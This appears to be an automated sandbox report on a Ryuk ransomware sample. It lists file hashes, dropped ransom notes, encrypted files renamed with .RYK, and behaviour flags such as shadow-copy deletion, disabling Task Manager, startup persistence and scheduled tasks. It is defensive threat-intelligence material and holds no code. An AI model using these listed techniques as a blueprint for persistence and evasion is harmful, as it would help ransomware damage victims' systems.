SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 bea6ddd31c498e9f4e9f6bc95923ee3e
SHA1 0cfd17881260146fb9417dbf9694fa6ef2211105
SHA256 8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
SHA512 910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\RYUKID

MD5 bea6ddd31c498e9f4e9f6bc95923ee3e
SHA1 0cfd17881260146fb9417dbf9694fa6ef2211105
SHA256 8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
SHA512 910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-09 18:31

Reported

2023-03-09 18:33

Platform

win10v2004-20230220-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

Signatures

Ryuk

ransomware ryuk

Deletes shadow copies

ransomware

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML.[[email protected]].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr-Latn-RS.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-text.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfont.properties.ja.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BKANT.TTF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\LICENSE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_thumbnailview_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\manifest.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
